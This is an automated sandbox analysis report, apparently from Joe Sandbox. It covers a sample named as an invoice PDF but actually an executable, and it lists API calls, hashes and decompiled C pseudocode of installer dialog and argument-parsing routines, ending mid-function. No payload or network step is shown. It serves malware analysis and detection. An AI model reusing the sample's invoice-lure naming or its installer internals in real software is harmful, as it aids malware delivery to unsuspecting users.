0x00404de9
0x00404df8
0x00404e02
0x00404e0a
0x00404e11
0x00404e19
0x00404e19
0x00404de4
0x00404e4f
0x00404e50
0x00404e5c
0x00404e5c
0x00404e69
0x00404e84
0x00404e88
0x00404ea5
0x00404eaa
0x00000000
0x00404e8a
0x00404e8f
0x00404e98
0x00405222
0x00405234
0x00405234
0x00404e88
0x00000000
0x00404e69
0x00404da0

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C57
GetDlgItem.USER32(?,00000408), ref: 00404C62
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CAC
LoadBitmapW.USER32(0000006E), ref: 00404CBF
SetWindowLongW.USER32(?,000000FC,00405237), ref: 00404CD8
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CEC
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CFE
SendMessageW.USER32(?,00001109,00000002), ref: 00404D14
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D20
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D32
DeleteObject.GDI32(00000000), ref: 00404D35
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D60
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D6C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E02
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E2D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E41
GetWindowLongW.USER32(?,000000F0), ref: 00404E70
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E7E
ShowWindow.USER32(?,00000005), ref: 00404E8F
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F8C
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FF1
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405006
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040502A
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040504A
ImageList_Destroy.COMCTL32(?), ref: 0040505F
GlobalFree.KERNEL32(?), ref: 0040506F
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050E8
SendMessageW.USER32(?,00001102,?,?), ref: 00405191
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051A0
InvalidateRect.USER32(?,00000000,?), ref: 004051C0
ShowWindow.USER32(?,00000000), ref: 0040520E
GetDlgItem.USER32(?,000003FE), ref: 00405219
ShowWindow.USER32(00000000), ref: 00405220

Strings

M, xrefs: 00404DE9
, xrefs: 004051F8
N, xrefs: 00404ECA

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
Instruction ID: 12ef5a05c60c6c20dcbbeb1066bc3531ea5280fcb44ea9637735f2a88fa268fa
Opcode Fuzzy Hash: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
Instruction Fuzzy Hash: 670260B0900209EFEB109F64DD85AAE7BB5FB85314F10817AF610BA2E1DB799D41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046C3 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046C3(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0ef8; // 0xb7d614
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x7a9000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E004058A5(0x3fb, _t146);
					E004064F3(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058A5(0x3fb, _t146);
							if(E00405C38(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040625F(0x79fef0, _t146);
							_t87 = E00406639("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040625F(0x79fef0, _t146);
								_t89 = E00405BDB(0x79fef0);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79fef0,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79fef0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79fef0,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B7C(0x79fef0);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79fef0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B60(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a79fc; // 0xb8007e
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404B48(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79fee0);
									} else {
										E00404A7F(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8ae4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404216(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f10 == _t158) {
									E0040461C();
								}
								 *0x7a1f10 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f20;
							_v60 = E00404A19;
							_v56 = _t146;
							_v68 = E00406281(_t146, 0x7a1f20, _t167, 0x7a06f8, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B30(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a34 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a34 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") {
									E00406281(_t146, 0x7a1f20, _t167, 0, _t125);
									if(lstrcmpiW(0x7a69c0, 0x7a1f20) != 0) {
										lstrcatW(_t146, 0x7a69c0);
									}
								}
								 *0x7a1f10 =  *0x7a1f10 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BA7(_t146) != 0 && E00405BDB(_t146) == 0) {
						E00405B30(_t146);
					}
					 *0x7a79f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E004041F4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041F4(_t167);
					E00404229(_t166);
					_t138 = E00406639(7);
					if(_t138 == 0) {
						L53:
						return E0040425B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}

0x004046c3
0x004046c9
0x004046cf
0x004046d3
0x004046d6
0x004046dc
0x004046ea
0x004046ed
0x004046f5
0x004046fb
0x004046fb
0x00404707
0x0040470a
0x00404778
0x0040477f
0x00404856
0x0040485d
0x0040486c
0x0040486c
0x00404870
0x0040487a
0x00404887
0x00404889
0x00404889
0x00404897
0x0040489e
0x004048a5
0x004048a8
0x004048e4
0x004048e6
0x004048ec
0x004048f1
0x004048f5
0x004048f7
0x004048f7
0x00404913
0x00000000
0x00404915
0x00404918
0x00404926
0x0040492c
0x0040492d
0x00404930
0x00404933
0x00000000
0x00404933
0x004048aa
0x004048ac
0x004048b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004048b2
0x004048b2
0x004048bf
0x004048c4
0x00000000
0x00000000
0x004048c8
0x004048ca
0x004048ca
0x004048d3
0x004048d5
0x004048da
0x004048dd
0x004048e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004048e2
0x0040493f
0x00404949
0x0040494c
0x0040494f
0x00404956
0x00404956
0x00404958
0x00404958
0x0040495d
0x0040495f
0x00404967
0x0040496e
0x00404970
0x0040497b
0x0040497b
0x00404970
0x00404982
0x0040498b
0x00404995
0x0040499d
0x004049b8
0x0040499f
0x004049a8
0x004049a8
0x0040499d
0x004049bd
0x004049c2
0x004049c7
0x004049d0
0x004049d0
0x004049d9
0x004049db
0x004049db
0x004049e7
0x004049ef
0x004049f9
0x004049f9
0x004049fe
0x00000000
0x004049fe
0x004048a8
0x0040485f
0x00404866
0x00000000
0x00000000
0x00000000
0x00404866
0x00404785
0x0040478e
0x004047a8
0x004047ad
0x004047b7
0x004047be
0x004047ca
0x004047cd
0x004047d0
0x004047d7
0x004047df
0x004047e2
0x004047e6
0x004047ed
0x004047f5
0x0040484f
0x004047f7
0x004047f8
0x004047ff
0x00404809
0x00404811
0x0040481e
0x00404832
0x00404836
0x00404836
0x00404832
0x0040483b
0x00404848
0x00404848
0x004047f5
0x00000000
0x004047ad
0x0040479b
0x00000000
0x00000000
0x004047a1
0x00000000
0x0040470c
0x00404719
0x00404722
0x0040472f
0x0040472f
0x00404736
0x0040473c
0x00404745
0x00404748
0x0040474b
0x00404753
0x00404756
0x00404759
0x0040475f
0x00404766
0x0040476d
0x00404a04
0x00404a16
0x00404773
0x00404776
0x00000000
0x00404776
0x0040476d

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404712
SetWindowTextW.USER32(00000000,-007A9000), ref: 0040473C
SHBrowseForFolderW.SHELL32(?), ref: 004047ED
CoTaskMemFree.OLE32(00000000), ref: 004047F8
lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,-007A9000), ref: 0040482A
lstrcatW.KERNEL32(-007A9000,Call), ref: 00404836
SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404848

Part of subcall function 004058A5: GetDlgItemTextW.USER32(?,?,00000400,0040487F), ref: 004058B8

Part of subcall function 004064F3: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
Part of subcall function 004064F3: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
Part of subcall function 004064F3: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
Part of subcall function 004064F3: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,-007A9000,?,0079FEF0,-007A9000,-007A9000,000003FB,-007A9000), ref: 0040490B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404926

Part of subcall function 00404A7F: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
Part of subcall function 00404A7F: wsprintfW.USER32 ref: 00404B29
Part of subcall function 00404A7F: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C

Strings

A, xrefs: 004047E6
Call, xrefs: 00404824, 00404829, 00404834
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 00404813

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call
API String ID: 2624150263-3865270459
Opcode ID: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
Instruction ID: 1a43a6be4abc44de482ff05cd7d85368efa207dbef88ee5e6ca465c7332a2ce1
Opcode Fuzzy Hash: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
Instruction Fuzzy Hash: B0A1AEF1900209ABDB11AFA5CD45AAFB7B8EF84314F10843BF611B62D1DB7C99418B69

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push("true");
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push("true");
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
